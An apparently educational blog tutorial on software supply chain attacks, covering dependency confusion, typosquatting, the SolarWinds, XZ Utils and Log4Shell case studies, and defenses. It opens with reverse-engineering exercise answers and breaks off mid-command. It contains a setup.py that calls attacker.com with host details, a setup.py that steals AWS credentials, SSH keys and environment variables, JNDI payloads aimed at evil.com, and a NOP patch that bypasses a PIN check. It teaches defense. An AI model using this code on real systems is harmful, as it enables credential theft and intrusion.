Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source

What will I learn
- What supply chain attacks are and why they represent the most devastating attack class in modern security;
- Software supply chain -- compromising open-source packages, build systems, and update mechanisms;
- Dependency confusion -- tricking package managers into installing malicious internal-name packages from public registries;
- Typosquatting -- publishing malicious packages with names similar to popular libraries;
- Build system poisoning -- compromising CI/CD pipelines, build servers, and code signing infrastructure;
- SolarWinds, Log4Shell, and XZ Utils -- detailed case studies of real supply chain attacks that shook the industry;
- SBOMs and dependency auditing -- understanding what is actually in your software;
- Defense: dependency pinning, lock files, signature verification, SLSA framework, and private registry hardening.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- Understanding of IaC and CI/CD security from Episode 38;
- Familiarity with package managers (npm, pip, cargo);
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate/Advanced
Curriculum (of the Learn Ethical Hacking Series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
- Learn Ethical Hacking (#38) - Infrastructure as Code - Securing the Automation
- Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
- Learn Ethical Hacking (#40) - DNS Attacks - Exploiting the Internet's Foundation
- Learn Ethical Hacking (#41) - Exploitation Frameworks - Metasploit and Cobalt Strike
- Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own
- Learn Ethical Hacking (#43) - Exploit Development Advanced - Modern Mitigations and Bypasses
- Learn Ethical Hacking (#44) - Reverse Engineering - Understanding Binaries
- Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source (this post)
Step 1: Ghidra decompiler showed:
void check_pin(char *input) {
if (atoi(input) == 7394) { <-- integer constant visible!
puts("Access granted");
} else {
puts("Access denied");
}
}
The constant 7394 (0x1CE2) is visible as an immediate operand
in: CMP EAX, 0x1ce2 at offset 0x119b
Step 2: Find the conditional jump
0x11a0: JNE 0x11b8 (jump to "denied" if not equal)
JNE opcode: 0x75, relative offset: 0x16
Step 3: Patch -- NOP out the JNE
with open('pin_checker', 'rb') as f:
    data = bytearray(f.read())
# NOP the 2-byte JNE instruction at file offset 0x11a0
data[0x11a0] = 0x90  # NOP
data[0x11a1] = 0x90  # NOP
with open('pin_checker_patched', 'wb') as f:
    f.write(data)
import os
os.chmod('pin_checker_patched', 0o755)
Verification:
./pin_checker_patched 0000 -> "Access granted"
./pin_checker_patched 9999 -> "Access granted"
Any PIN now works because the branch is eliminated
Two things worth noting. First, the integer constant `7394` was directly visible in the decompiler output -- Ghidra shows numeric constants in the comparison, so you can just read the PIN. No dynamic analysis needed. Second, the NOP patch (replacing the conditional jump with two NOP bytes) is the simplest possible binary modification. The program now falls through from the comparison straight into the "granted" path regardless of the comparison result. In real-world DRM cracking this exact technique is used constantly -- find the license check, NOP the branch, done.
**Exercise 3:** UPX packing analysis.
```text
Packed binary analysis:
BEFORE unpacking (Ghidra):
- Sections: UPX0 (0 bytes on disk, large virtual size),
UPX1 (compressed data), UPX2 (small, metadata)
- Functions detected: 3 (UPX stub only)
- Defined strings: "UPX!", "$Info: This file is packed with
the UPX executable packer http://upx.sf.net $"
- Decompiler: shows only the decompression routine
- No application logic visible at all
AFTER unpacking (upx -d binary, re-import to Ghidra):
- Sections: .text, .data, .bss, .rodata (normal ELF layout)
- Functions detected: 47
- Defined strings: 83 (passwords, URLs, error messages, file paths)
- Full decompilation of all functions available
- All vulnerability patterns (strcpy, sprintf) now visible
VMProtect vs UPX comparison:
- UPX: compression only. Single layer. Deterministic unpacking.
upx -d reverses it perfectly. No anti-debug.
- VMProtect: code VIRTUALIZATION. Translates x86 instructions
to a custom bytecode interpreted by a built-in VM. Each
protected binary gets a unique VM instruction set. Cannot
be mechanically unpacked. Requires:
1. Identify the VM dispatch loop
2. Map virtual opcodes to their real operations
3. Reconstruct the original logic from VM traces
4. Anti-debug: checks IsDebuggerPresent, NtQueryInformation,
timing checks, hardware breakpoint detection
5. Integrity checks: CRC/hash of protected sections
Analysis time: hours to weeks vs seconds for UPX.
```
The contrast between UPX and VMProtect is the difference between a locked door and a maze. UPX wraps the binary in a compression layer that has a known, deterministic reversal. VMProtect transforms the code itself into something fundamentally different -- a custom language that only the embedded interpreter can execute. If you've ever tried to reverse engineer VMProtect-protected software, you know the feeling of staring at thousands of mov/xor/jmp instructions that are the VM dispatcher, not the actual program logic. It is, to put it mildly, not a fun afternoon ;-)
Learn Ethical Hacking (#45) - Supply Chain Attacks - Poisoning the Source
Episode 44 covered reverse engineering -- the art of understanding compiled binaries without source code. We went through static analysis with Ghidra (the NSA's free RE framework with its excellent decompiler), dynamic analysis with GDB and pwndbg (watching binaries execute in real time), x86 assembly pattern recognition (the minimum you need to read disassembly productively), string analysis as the highest-value lowest-effort first step, binary patching to modify program behavior at the byte level, and anti-reversing techniques from simple symbol stripping through UPX packing to commercial-grade code virtualization with VMProtect. You can now take an unknown binary, find interesting strings, trace cross-references to the code that uses them, read the decompiler output to understand the logic, verify your understanding dynamically, and identify vulnerability patterns in closed-source software.
Every attack we have covered so far -- all 44 episodes of scanning, exploiting, escalating, pivoting, reverse engineering -- requires the attacker to reach the target. Scan the network. Find the service. Discover the vulnerability. Write the exploit. Gain access. It's an active, adversarial process where the attacker works to break into something that is trying to keep them out.
Supply chain attacks invert this entire model.
Instead of attacking the target, you attack something the target trusts and installs voluntarily. You poison the library they depend on. You compromise the build system that creates their software. You backdoor the update mechanism they run automatically every night. The target installs your malware themselves, believing it is a legitimate update from a trusted source. No scanning. No exploitation. No firewall to bypass. The front door is open because the victim opened it.
This is why supply chain attacks are the most dangerous class in modern security: they weaponize trust itself.
Here we go.
Why the Supply Chain Is the Weakest Link
Modern software is not written from scratch. A typical Node.js web application has 500-1,500 dependencies in its node_modules directory. A Python project with a handful of pip install commands might pull in 30-60 transitive dependencies that the developer never explicitly requested and probably doesn't know exist. A Go project that imports five packages might resolve to forty modules after the dependency graph is fully expanded.
Each of those dependencies is an attack surface. Every one of them was written by someone, maintained by someone, published through some registry, and installed by some package manager. At any point in that chain -- the developer's laptop, the CI/CD pipeline, the package registry, the DNS resolution of the registry, the TLS certificate that authenticates it -- a compromise can inject malicious code that flows downstream to every project that depends on it.
# How many dependencies does YOUR project actually have?
# Node.js:
cd my-project
npm ls --all | wc -l
# Output: 1,247 (typical for a React app)
# Python:
pip install pipdeptree
pipdeptree --warn silence | grep -c "installed"
# Output: 89 (typical for a Django project)
# Go:
go list -m all | wc -l
# Output: 47 (typical for a web server)
# Rust:
cargo tree | wc -l
# Output: 312 (typical for an actix-web project)
Those numbers are the attack surface of your supply chain. 1,247 npm packages means 1,247 maintainer accounts that could be compromised, 1,247 build systems that could be poisoned, 1,247 package versions that could be replaced with malicious ones. You didn't audit any of them. You probably don't know what most of them do. And your application trusts every single one of them with the same permissions your application has.
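For Python, the same count can be taken from inside the interpreter. The snippet below is a minimal sketch using only the standard library's `importlib.metadata`; the function names `normalize` and `dependency_summary` are made up for this example, and the numbers it prints describe whatever environment you run it in, nothing more.

```python
import re
from importlib import metadata


def normalize(name):
    """Normalize a project name the way package indexes compare names."""
    return re.sub(r"[-_.]+", "-", name).lower()


def dependency_summary():
    """Count installed distributions and the requirements they declare."""
    installed = set()
    declared = 0
    for dist in metadata.distributions():
        name = dist.metadata.get("Name")
        if not name:
            continue  # skip broken or half-removed installs
        installed.add(normalize(name))
        # dist.requires is None when a package declares no requirements
        declared += len(dist.requires or [])
    return {"installed": len(installed), "declared_requirements": declared}


summary = dependency_summary()
print(summary)
```

Run it inside the virtual environment of a project, not the system interpreter, otherwise you are counting unrelated packages.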
Dependency Confusion
Dependency confusion (discovered by Alex Birsan, published February 2021) exploits a fundamental ambiguity in how package managers resolve names. Many companies use internal packages with names like company-utils or internal-auth hosted on private registries. If those same names are NOT registered on the public registry (npm, PyPI, RubyGems), an attacker can register them publicly with a higher version number:
# Step 1: Attacker discovers internal package name
# Sources: leaked package.json files, job postings ("experience
# with our internal-analytics-sdk"), error messages in public
# GitHub repos, npm/pip install logs in CI output
# Step 2: Attacker publishes on public PyPI:
# Package name: company-internal-utils
# Version: 99.0.0 (higher than the internal 1.2.3)
# setup.py contains:
# setup.py -- malicious package (dependency confusion PoC)
from setuptools import setup
import subprocess
import socket
import os
# Exfiltrate proof of execution
try:
hostname = socket.gethostname()
username = os.getenv('USER', 'unknown')
cwd = os.getcwd()
subprocess.Popen([
'curl', '-s',
f'https://attacker.com/callback?'
f'pkg=company-internal-utils&'
f'host={hostname}&user={username}&cwd={cwd}'
])
except Exception:
pass
setup(
name='company-internal-utils',
version='99.0.0',
description='Internal utilities',
packages=[],
)
# Step 3: When the company's build system runs:
pip install company-internal-utils
# pip checks PyPI first (or in addition to internal registry)
# finds version 99.0.0 (higher than internal 1.2.3)
# installs the MALICIOUS public package
# The malicious setup.py executes during installation
# Attacker receives callback with hostname, username, working dir
Birsan used this exact technique to achieve code execution inside more than 35 major companies, including Apple, Microsoft, PayPal, Tesla, Uber, and Shopify. All from registering packages on public registries. He earned over $130,000 in bug bounties from a single research technique.
The root cause is that pip (and npm, and other package managers) will check public registries even when a private registry is configured, and will prefer the higher version number regardless of which registry it comes from. If you configure pip with both an internal registry and PyPI as a fallback, the fallback can override the internal package.
# VULNERABLE configuration -- pip.conf:
[global]
index-url = https://internal-registry.company.com/simple/
extra-index-url = https://pypi.org/simple/
# pip checks BOTH registries and takes the highest version!
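# SAFER configuration -- one index per pip invocation, no extra-index-url:
[global]
# public packages from PyPI (keep comments on their own line:
# pip.conf does not strip inline comments after a value)
index-url = https://pypi.org/simple/
# Internal packages: install them in a separate pip invocation with
# --index-url pointing at the internal registry ONLY
# Or: namespace your internal packages (not possible on PyPI,
# but npm supports @company/package-name scoping)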
# SAFEST: vendor all dependencies (copy into your repo)
pip download -r requirements.txt -d ./vendor/
# Then install from local directory only:
pip install --no-index --find-links=./vendor/ -r requirements.txt
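The vulnerable pattern above is easy to check for automatically. Here is a minimal sketch that parses pip.conf-style text with the standard library's `configparser` and flags any section that sets `extra-index-url`. The function name `risky_index_settings` and the two sample configs are hypothetical; a real audit would also need to look at the `PIP_EXTRA_INDEX_URL` environment variable and at `--extra-index-url` flags in requirements files and CI scripts.

```python
import configparser

VULNERABLE = """
[global]
index-url = https://internal-registry.company.com/simple/
extra-index-url = https://pypi.org/simple/
"""

SAFER = """
[global]
index-url = https://pypi.org/simple/
"""


def risky_index_settings(pip_conf_text):
    """Return one finding per section that configures extra-index-url."""
    parser = configparser.RawConfigParser()
    parser.read_string(pip_conf_text)
    findings = []
    for section in parser.sections():
        if parser.has_option(section, "extra-index-url"):
            extras = parser.get(section, "extra-index-url").split()
            findings.append(
                f"[{section}] extra-index-url adds {len(extras)} index(es); "
                "the highest version across ALL indexes wins"
            )
    return findings


print(risky_index_settings(VULNERABLE))
print(risky_index_settings(SAFER))
```

The first call reports one finding, the second an empty list.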
Typosquatting
Simpler than dependency confusion but disturbingly effective: publish a package with a name similar to a popular one. The attacker is betting on typos:
# Popular packages and their real typosquat examples:
# requests -> reqeusts, request, requets, requesrs
# lodash -> loadash, lodahs, lodashs
# colors -> colour, colorsjs, colrs
# express -> expres, expresss, exppress
# urllib3 -> urllib, urlib3
# beautifulsoup4 -> beautifulsoup, beautifulsoup3
# The malicious package typically:
# 1. Installs the REAL package as a dependency (so everything works)
# 2. Adds a background process that:
# - Steals environment variables (API keys, AWS credentials)
# - Installs a reverse shell
# - Exfiltrates SSH keys and browser cookies
# - Mines cryptocurrency
# Real example: event-stream (npm, discovered November 2018)
# Not a typosquat but a MAINTAINER TAKEOVER:
# - Attacker offered to maintain the popular event-stream package
# - Original maintainer transferred ownership (burnt out)
# - Attacker added dependency on "flatmap-stream" (malicious)
# - flatmap-stream contained encrypted payload targeting the
# Copay Bitcoin wallet application
# - Designed to steal private keys from Copay users who updated
# - event-stream had roughly 2 million weekly downloads at the time
# How a typosquat package steals credentials:
# This runs during pip install (in setup.py)
import os
import json
import urllib.request
data = {}
# Grab AWS credentials
aws_creds = os.path.expanduser('~/.aws/credentials')
if os.path.exists(aws_creds):
with open(aws_creds) as f:
data['aws'] = f.read()
# Grab SSH keys
ssh_dir = os.path.expanduser('~/.ssh/')
if os.path.exists(ssh_dir):
for fname in os.listdir(ssh_dir):
fpath = os.path.join(ssh_dir, fname)
if os.path.isfile(fpath):
with open(fpath) as f:
data[f'ssh_{fname}'] = f.read()
# Grab environment variables (often contain API keys)
data['env'] = dict(os.environ)
# Exfiltrate
req = urllib.request.Request(
'https://attacker.com/collect',
data=json.dumps(data).encode(),
headers={'Content-Type': 'application/json'}
)
urllib.request.urlopen(req)
That setup.py runs with full user permissions whenever pip has to build the package from a source distribution, which the attacker can guarantee by not publishing a wheel. No sandbox. No confirmation prompt. No warning. Whatever permissions the developer (or CI/CD service account) has, the malicious setup script has. On a developer laptop, that's SSH keys, AWS credentials, browser cookies, and everything in the home directory. On a CI/CD runner, it might be deployment keys, cloud provider tokens, and access to production infrastructure.
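On the defensive side, a cheap first filter is to compare every new dependency name against the names you already know and trust. The sketch below uses `difflib` from the standard library; the `POPULAR` list, the `possible_typosquat` name, and the 0.8 similarity cutoff are all assumptions chosen for illustration, and a real tool would use a much larger list of popular packages.

```python
import difflib

# Hypothetical allow-list; in practice this would be your own
# dependency inventory plus a list of the most-downloaded packages.
POPULAR = ["requests", "lodash", "colors", "express", "urllib3", "beautifulsoup4"]


def possible_typosquat(name, known=POPULAR, cutoff=0.8):
    """Return the known package this name resembles, or None.

    An exact match is the real package, so it is never flagged.
    """
    candidate = name.lower()
    if candidate in known:
        return None
    matches = difflib.get_close_matches(candidate, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None


for name in ["reqeusts", "expresss", "requests", "numpy"]:
    print(name, "->", possible_typosquat(name))
```

A hit is not proof of malice (plenty of legitimate packages have similar names), it is a prompt to go look at the package before it lands in a lock file.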
Build System Poisoning -- SolarWinds
The SolarWinds attack (discovered December 2020, attributed to Russian SVR foreign intelligence) is the most sophisticated supply chain compromise ever documented. The attackers didn't compromise a package registry or trick developers into installing something. They compromised the build system itself -- the infrastructure that compiles and signs legitimate software updates:
SolarWinds Orion Attack Chain:
1. Initial access: attackers compromised SolarWinds' internal
build environment (TeamCity CI/CD servers) sometime in 2019
2. Build process injection: planted an implant (SUNSPOT) on the
build server that watched for Orion builds and swapped in a
backdoored source file during compilation. The malicious code
(SUNBURST backdoor) ended up in SolarWinds.Orion.Core.BusinessLayer.dll
-- a legitimate SolarWinds component
3. Code signing: the modified DLL was compiled and SIGNED with
SolarWinds' valid code signing certificate. The signature was
legitimate. The certificate was legitimate. The only thing
that wasn't legitimate was the extra code inside the DLL.
4. Distribution: SolarWinds distributed the poisoned update
through their normal update channels. Up to roughly 18,000
organizations downloaded and installed it.
5. SUNBURST activation: the backdoor waited 12-14 DAYS after
installation before activating (to evade sandboxes that run
samples for hours/days). It communicated via DNS to C2 servers
using subdomains that encoded victim identification data.
6. Selective targeting: of 18,000 victims, attackers only
activated secondary payloads (TEARDROP, RAINDROP) on ~100
high-value targets: US Treasury, Department of Commerce,
Department of Homeland Security, FireEye, Microsoft.
7. Detection: 9 MONTHS of undetected access. FireEye discovered
it in December 2020 during investigation of their OWN breach.
A security company got hacked and only found out because
attackers stole their red team tools, which triggered an
internal investigation that eventually traced back to the
SolarWinds update.
Key lesson: the code was signed. The update was legitimate
according to every verification mechanism that existed.
Certificate pinning wouldn't help -- the certificate was real.
Hash verification wouldn't help -- the hash matched the signed
binary. The BUILD SYSTEM was the point of compromise, and that
meant every downstream defense was bypassed by design.
Think about what that means for your own build pipeline. If an attacker compromises your CI/CD server (your GitHub Actions runner, your Jenkins controller, your GitLab CI worker), they can modify any artifact that pipeline produces. Every Docker image, every npm package, every compiled binary that flows through that pipeline is potentially compromised. And everything downstream -- every customer, every deployment, every server that pulls those artifacts -- trusts them implicitly because they came from "the build system."
The XZ Utils Backdoor (2024)
If SolarWinds was the most sophisticated supply chain attack in terms of technical execution, the XZ Utils backdoor (CVE-2024-3094, discovered March 2024) was the most chilling in terms of social engineering. An actor widely suspected to be state-backed spent more than two years building trust as an open-source contributor before inserting a backdoor:
Timeline of the XZ Utils compromise:
2021: An account called "Jia Tan" starts contributing to XZ Utils
(liblzma compression library, used by virtually every Linux
distribution). Small, helpful patches. Bug fixes. Documentation
improvements. The kind of contributions that make a maintainer
grateful.
2022: Jia Tan becomes a trusted co-maintainer. The original
maintainer (Lasse Collin) is a solo developer maintaining
critical infrastructure in his spare time. He's overworked.
Jia Tan helps carry the load. Other accounts pressure Collin
to add Jia Tan as maintainer (these accounts may have been
sock puppets -- part of the operation).
2023: Jia Tan gains commit access and starts managing release
tarballs. Trusted enough to cut releases. Two years of
patient, legitimate contribution.
2024 (February): Jia Tan inserts the backdoor. The payload was
hidden in binary "test files" (.xz/.lzma compressed blobs)
committed to the git repository, but the build-script change
that activates it (a modified build-to-host.m4) shipped ONLY
in the release TARBALLS, which is what distributions actually
package. During the build, that script extracted the blobs
and linked the result into liblzma.
The backdoor abused liblzma's IFUNC resolvers to hook
RSA_public_decrypt in OpenSSH's sshd (which, on distributions
that patch sshd for systemd notification, loads liblzma via
libsystemd). The result: an attacker holding the matching
private key could send a crafted SSH certificate and get
remote code execution on affected Linux systems.
Pre-authentication. No credentials needed.
2024 (March 29): Andres Freund, a Microsoft engineer and PostgreSQL
developer, reports the backdoor on the oss-security mailing list.
He had noticed SSH logins were about 500ms slower than expected,
profiled the code, and traced the latency to liblzma.
500 milliseconds of latency prevented a global compromise.
Affected: xz 5.6.0 and 5.6.1 (released Feb-March 2024)
Caught before reaching stable releases of most
major distributions. Fedora 40 beta, Debian testing,
and some rolling-release distros were affected.
The XZ attack is terrifying because it exploits something that cannot be patched with software: human trust. Lasse Collin trusted Jia Tan because Jia Tan had spent two years earning that trust through real, useful contributions. The social engineering was patient, sophisticated, and targeted a single point of failure -- an overworked solo maintainer of critical infrastructure. No technical vulnerability was needed. The vulnerability was organizational: critical open-source infrastructure maintained by one person who was desperate for help.
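One defense that follows directly from this case is to compare what a release tarball contains against the git checkout of the same tag. Below is a minimal sketch using only `tarfile`, `hashlib` and `pathlib`; the function name `tarball_vs_checkout` and the tiny demo project are invented for illustration. Autotools tarballs legitimately contain generated files that are not in git, so the report is a starting point for manual review and not a verdict.

```python
import hashlib
import io
import tarfile
import tempfile
from pathlib import Path


def tarball_vs_checkout(tarball_path, checkout_dir, strip_components=1):
    """Return (only_in_tarball, content_differs) as sorted lists of paths.

    strip_components drops the leading 'project-1.0/' directory that
    release tarballs usually wrap their contents in.
    """
    checkout = Path(checkout_dir)
    only_in_tarball, differs = [], []
    with tarfile.open(str(tarball_path)) as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            parts = Path(member.name).parts[strip_components:]
            if not parts:
                continue
            rel = Path(*parts)
            tar_digest = hashlib.sha256(tar.extractfile(member).read()).hexdigest()
            local = checkout / rel
            if not local.is_file():
                only_in_tarball.append(rel.as_posix())
            elif hashlib.sha256(local.read_bytes()).hexdigest() != tar_digest:
                differs.append(rel.as_posix())
    return sorted(only_in_tarball), sorted(differs)


# Demo: a checkout with one file, and a tarball that adds a build macro.
with tempfile.TemporaryDirectory() as tmp:
    checkout = Path(tmp) / "checkout"
    (checkout / "src").mkdir(parents=True)
    (checkout / "src" / "main.c").write_text("int main(void) { return 0; }\n")
    tarball = Path(tmp) / "demo-1.0.tar.gz"
    with tarfile.open(str(tarball), "w:gz") as tar:
        tar.add(str(checkout / "src" / "main.c"), arcname="demo-1.0/src/main.c")
        extra = b"# tarball-only build macro\n"
        info = tarfile.TarInfo("demo-1.0/m4/extra.m4")
        info.size = len(extra)
        tar.addfile(info, io.BytesIO(extra))
    report = tarball_vs_checkout(tarball, checkout)

print(report)
```

In the demo, the macro file that exists only in the tarball is the single entry in the first list, which is the same shape of discrepancy the XZ release tarballs had.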
Software Bill of Materials (SBOM)
An SBOM is a complete inventory of every component in your software -- every library, every dependency, every transitive dependency, with version numbers and known vulnerability status. When a new CVE drops, the first question every organization asks is "are we affected?" Without an SBOM, answering that question means searching every codebase, every build artifact, every container image. With an SBOM, it's a database query:
# Generate SBOM with Syft (from Anchore)
# (older Syft releases spelled this "syft packages dir:...")
syft dir:./my-project -o cyclonedx-json > sbom.json
# Generate for a container image
syft docker:nginx:latest -o spdx-json > nginx-sbom.json
# Scan SBOM for known vulnerabilities with Grype
grype sbom:sbom.json
# NAME INSTALLED FIXED-IN VULNERABILITY SEVERITY
# log4j-core 2.14.1 2.15.0 CVE-2021-44228 Critical
# jackson-databind 2.9.8 2.12.7.1 CVE-2022-42003 High
# commons-text 1.9 1.10.0 CVE-2022-42889 Critical
# Language-specific dependency auditing:
npm audit # Node.js
npm audit --json # machine-readable output
pip-audit # Python (pip)
safety check # Python (Safety DB)
cargo audit # Rust
govulncheck ./... # Go
bundle audit # Ruby
# Continuous monitoring in CI/CD:
# GitHub: Dependabot (built-in, free)
# GitLab: Dependency Scanning (built-in)
# Third-party: Snyk, Renovate, Socket.dev
# Example GitHub Actions workflow for dependency scanning:
# .github/workflows/security.yml
# name: Dependency Audit
# on: [push, pull_request]
# jobs:
# audit:
# runs-on: ubuntu-latest
# steps:
# - uses: actions/checkout@v4
# - run: npm ci
# - run: npm audit --audit-level=high
# - run: npx better-npm-audit audit
SBOMs answer the question "what is in my software?" which is the prerequisite for answering "am I affected?" When Log4Shell dropped, organizations with SBOMs could identify affected systems in hours. Organizations without SBOMs spent weeks searching their infrastructure, and many never found all instances because Log4j was buried three or four levels deep in transitive dependency chains that no human had ever examined.
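To make the "database query" point concrete, here is a minimal sketch that searches a CycloneDX JSON document for a component by name. The `find_component` helper and the two-entry sample SBOM are made up for this example; it only walks the top-level `components` array, so nested components would need a recursive version.

```python
import json

# Hypothetical, heavily trimmed CycloneDX document for illustration.
SAMPLE_SBOM = json.loads("""
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "log4j-core", "version": "2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"},
    {"type": "library", "name": "commons-text", "version": "1.9",
     "purl": "pkg:maven/org.apache.commons/commons-text@1.9"}
  ]
}
""")


def find_component(sbom, name):
    """Return (name, version, purl) for every top-level component called name."""
    hits = []
    for component in sbom.get("components", []):
        if component.get("name") == name:
            hits.append(
                (component.get("name"), component.get("version"), component.get("purl"))
            )
    return hits


print(find_component(SAMPLE_SBOM, "log4j-core"))
print(find_component(SAMPLE_SBOM, "left-pad"))
```

Point the same function at every `sbom.json` your pipelines produce and "are we affected?" becomes a loop over files instead of a week of grepping.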
Case Study: Log4Shell (CVE-2021-44228)
Log4Shell deserves its own section because it is the single best illustration of how transitive dependencies create supply chain risk at scale:
Log4Shell (CVE-2021-44228) -- December 2021
Vulnerability: JNDI lookup feature in Apache Log4j 2.x
When Log4j processes a log message containing ${jndi:ldap://...},
it performs a JNDI (Java Naming and Directory Interface) lookup
to the specified server. That server can respond with a Java
class that Log4j downloads and EXECUTES.
Attack: inject ${jndi:ldap://evil.com/payload} into ANY field
that gets logged. HTTP headers, form fields, user agent strings,
API parameters, chat messages, search queries -- anything that
passes through Log4j's message formatting.
Example attack vectors:
User-Agent: ${jndi:ldap://evil.com/a}
X-Forwarded-For: ${jndi:ldap://evil.com/a}
Search query: ${jndi:ldap://evil.com/a}
Chat message: ${jndi:ldap://evil.com/a}
Even Minecraft server chat: type the JNDI string in chat,
the server logs it, Log4j resolves it, code execution.
Blast radius: Log4j 2 is one of the most widely used Java
logging libraries, so it was embedded in an enormous range of
Java applications and JVM-based tools. Enterprise
software, cloud services (AWS, Azure, GCP all had affected
services), Minecraft, Apache Solr, Apache Struts, VMware,
Cisco, IBM -- the list reads like "every company that
uses Java." Widely repeated estimates put the number of
potentially affected devices in the billions.
Supply chain angle: many affected applications did NOT directly
depend on Log4j. They used a framework or product that pulled
it in as the logging backend (a Spring Boot app switched from
the default Logback to Log4j 2, for example), or they used
Elasticsearch, which used Log4j internally.
The developers of the affected applications had never written
"import org.apache.logging.log4j" in their code. It was 3-4
levels deep in the dependency tree. They didn't know it was
there until CVE-2021-44228 was published and the internet
caught fire.
Timeline:
Nov 24, 2021: Reported to Apache by Alibaba Cloud security
Dec 9, 2021: Public disclosure + mass exploitation begins
Dec 10: Log4j 2.15.0 released (incomplete fix)
Dec 13: Log4j 2.16.0 released (CVE-2021-45046: JNDI disabled by default)
Dec 17: Log4j 2.17.0 released (CVE-2021-45105: denial of service)
Dec 28: Log4j 2.17.1 released (CVE-2021-44832: yet another bypass patched)
Four patch releases in 18 days as bypasses kept appearing.
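For hunting exploitation attempts in request data, the plain form of the payload can be matched with a regular expression. This is a deliberately naive sketch: the `JNDI_PATTERN` regex and the `suspicious_fields` helper are my own illustration, and attackers quickly moved to nested lookups such as `${${lower:j}ndi:...}` that a pattern like this misses. Treat it as a triage aid, not a fix; the fix is upgrading Log4j.

```python
import re

# Matches the unobfuscated lookup only, e.g. ${jndi:ldap://host/a}
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|http)://", re.IGNORECASE
)


def suspicious_fields(fields):
    """Return the names of request fields that contain a plain JNDI lookup."""
    return [name for name, value in fields.items() if JNDI_PATTERN.search(value)]


request = {
    "User-Agent": "${jndi:ldap://evil.com/a}",
    "X-Forwarded-For": "203.0.113.7",
    "q": "how to configure logging",
}
print(suspicious_fields(request))
```

Only the `User-Agent` field is reported for this sample request.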
Defense: Securing the Supply Chain
Having said that, supply chain attacks are not unstoppable. The defenses exist. They are just not universally adopted, which is why these attacks keep working:
# 1. Pin dependencies to exact versions + hash verification
# requirements.txt (Python):
requests==2.31.0 \
--hash=sha256:58cd2187c01e70e6e26505bca751...
cryptography==41.0.7 \
--hash=sha256:13f93ce9bea8016c5e2...
# Install with hash enforcement:
pip install --require-hashes -r requirements.txt
# If ANY hash doesn't match, installation FAILS
# package-lock.json (npm) already pins + hashes by default
# Use npm ci (not npm install) in CI/CD:
npm ci
# Installs exactly what's in the lock file, fails if changed
# 2. Vendor dependencies (copy into your repo)
# Go makes this easy:
go mod vendor
# All dependencies are now in ./vendor/ inside your repo
# No runtime dependency on external registries
# Build with: go build -mod=vendor ./...
# Python equivalent:
pip download -r requirements.txt -d ./vendor/
pip install --no-index --find-links=./vendor/ -r requirements.txt
# This eliminates the registry as an attack vector entirely
# Tradeoff: repo size increases, updates are manual
# 3. SLSA framework (Supply-chain Levels for Software Artifacts)
# https://slsa.dev/
#
# SLSA v1.0 build track:
# Build L1: Provenance exists (a statement of how the artifact
# was built: from what source, by what build system)
# Build L2: Build runs on a hosted build platform that generates
# and SIGNS the provenance
# Build L3: Build platform is hardened: builds are isolated from
# each other and signing keys are unreachable from build steps
# The earlier v0.1 draft also had a Level 4 (two-person review,
# hermetic and reproducible builds), which v1.0 defers to future versions
# Verify SLSA provenance for a container image:
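cosign verify-attestation \
--type slsaprovenance \
--certificate-oidc-issuer https://token.actions.githubusercontent.com \
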